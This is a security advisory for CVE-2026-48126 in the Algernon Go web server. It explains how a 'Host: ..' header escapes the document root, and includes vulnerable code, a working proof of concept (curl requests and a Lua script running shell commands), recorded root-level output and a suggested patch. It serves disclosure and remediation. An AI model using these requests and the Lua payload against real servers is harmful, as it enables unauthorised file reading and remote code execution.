New: Corgea AI Pentesting — autonomous penetration testing in hours, not weeks
HIGH 8.2 Go

Algernon: Host header path traversal in --domain mode reads files and runs Lua from parent dir

GHSA-jc3j-x6pg-4hmv · CVE-2026-48126 · GO-2026-5460

Published · Modified

Description

Summary

When algernon is started with --domain (or --letsencrypt, which silently turns on --domain at engine/flags.go:372), the request handler resolves the served directory by joining the configured --dir with the value of the client-supplied Host header. The join is performed by filepath.Join with no validation, so a Host: .. header walks one level above the document root. Subsequent file resolution then exposes everything in that parent directory — arbitrary file read, full directory listing, and, if any .lua file is present, server-side Lua execution. Algernon 1.17.7 and earlier are affected.

Details

engine/handlers.go (function RegisterHandlers, around line 510):

allRequests := func(w http.ResponseWriter, req *http.Request) {
    ...
    servedir := servedir
    if addDomain {
        servedir = filepath.Join(servedir, utils.GetDomain(req))   // <— line 531
    }
    ...
    filename := utils.URL2filename(servedir, urlpath)

utils/web.go (GetDomain):

func GetDomain(req *http.Request) string {
    host, _, err := net.SplitHostPort(req.Host)
    if err != nil {
        return req.Host          // <— Host header returned verbatim
    }
    return host
}

utils/files.go (URL2filename) only sanitises the URL path — it never inspects dirname:

func URL2filename(dirname, urlpath string) string {
    if strings.Contains(urlpath, "..") {
        return dirname + Pathsep         // dirname is trusted here
    }
    ...
}

engine/flags.go (auto-enable in CertMagic / Let's Encrypt mode):

if ac.useCertMagic {
    ...
    ac.serverAddDomain = true   // <— line 372
}

Putting it together:

  1. The client sends Host: ... Go's HTTP server accepts the value because . is in the URI host whitelist and there are no other characters to validate; req.Host is ...
  2. GetDomain returns .. (no port, net.SplitHostPort fails — fallback path).
  3. filepath.Join("/srv/algernon", "..") cleans to /srv.
  4. URL2filename("/srv", "/SECRET.txt") returns /srv/SECRET.txt, which the handler opens with FilePage.
  5. For directory targets, DirPage lists the parent — sending / after Host: .. produces an HTML index of the parent of the docroot.
  6. If a file with a recognised algernon extension (.lua, .tl, .po2, .amber, .frm, .md, ...) is in the parent, the matching renderer runs server-side. .lua triggers full Lua execution, including run3(...) which calls exec.Command("sh", "-c", command) (see lua/run3/run3.go:23).

Multi-level traversal is blocked at the protocol layer because the Go HTTP parser rejects / in the Host: value, but a single .. is enough to step outside the operator's intended docroot — and many operators put scripts, configs, certificates, log files, or sibling sites in parent(serverDir). --letsencrypt is the supported way to run algernon as a multi-domain HTTPS server, and it implicitly turns this on without the operator noticing.

This bug is distinct from the previously-fixed handler.lua parent-walk (GHSA-xwcr-wm99-g9jc) — that one used the handler.lua discovery loop and walked above rootdir; this one stays inside the normal FilePage path and rewrites rootdir itself through filepath.Join(servedir, req.Host). It is also distinct from the upload savein() issue (GHSA-2j2c-pv62-mmcp).

PoC

Build the affected version:

git clone https://github.com/xyproto/algernon
cd algernon
go build -o /tmp/algernon .

Reproduce manually:

WORK=$(mktemp -d)
mkdir -p $WORK/site
echo '<h1>public</h1>' > $WORK/site/index.html
echo 'TOP-SECRET FROM PARENT DIR' > $WORK/SECRET.txt
cat > $WORK/pwn.lua <<'LUA'
print("=== RCE ===")
local out, err, code = run3("id; uname -a")
for _,v in ipairs(out) do print("  "..v) end
LUA

/tmp/algernon --httponly --dir $WORK/site --addr :7799 --server -n --domain --nolimit &
sleep 1

# 1. Arbitrary file read
curl -H 'Host: ..' http://127.0.0.1:7799/SECRET.txt
# -> TOP-SECRET FROM PARENT DIR

# 2. Parent directory listing
curl -H 'Host: ..' http://127.0.0.1:7799/ | grep -oP 'href="[^"]+"' | head
# -> href="/SECRET.txt", href="/pwn.lua", href="/site/", ...

# 3. Server-side Lua execution (RCE)
curl -H 'Host: ..' http://127.0.0.1:7799/pwn.lua
# -> === RCE ===
#      uid=0(root) gid=0(root) groups=0(root)
#      Linux ...

Recorded output from a real run:

[2] arbitrary file read via Host: ..
    TOP-SECRET FROM PARENT DIR

[3] directory listing of parent via Host: ..
    bytes=1278, links=1
    sample:
      href="/alg.log"
      href="/site/"
      href="/SECRET.txt"

[4] Lua RCE via Host: .. when .lua exists in parent
    === RCE ===
      uid=0(root) gid=0(root) groups=0(root)
      Linux fg0x0 6.6.87.2-microsoft-standard-WSL2 ... x86_64 GNU/Linux
    EXIT=0

Steps 2 and 3 reproduce with default flags (--domain alone, or --letsencrypt in production). Step 4 additionally requires a .lua file in the parent — common when an operator keeps shared scripts alongside the served directory, or when this bug is chained with any prior write primitive.

Impact

  • An unauthenticated remote attacker who can send a single HTTP request with a Host: .. header can read arbitrary files in parent(--dir) and enumerate that directory.
  • When --letsencrypt is used (the recommended way to obtain HTTPS), --domain is enabled silently, so any production multi-tenant deployment is exposed without the operator opting in.
  • The chained Lua-RCE path executes shell commands as the algernon process user. In the canonical --prod invocation documented in engine/config.go:208 (serverDirOrFilename = "/srv/algernon"), the parent is /srv; in multi-domain setups the parent often holds sibling site directories and shared .lua libraries.

Suggested fix

Reject Host header values that contain .., /, \, or that resolve outside the configured serverDirOrFilename. The simplest patch:

// engine/handlers.go, where addDomain is consumed
if addDomain {
    domain := utils.GetDomain(req)
    if domain == "" || strings.ContainsAny(domain, "/\\") || strings.Contains(domain, "..") {
        w.WriteHeader(http.StatusBadRequest)
        return
    }
    servedir = filepath.Join(servedir, domain)
}

A stronger fix when CertMagic is active is to constrain the lookup to the certMagicDomains allow-list that flags.go already builds.

Ready to move

Start Securing

Free, no credit card | First findings in minutes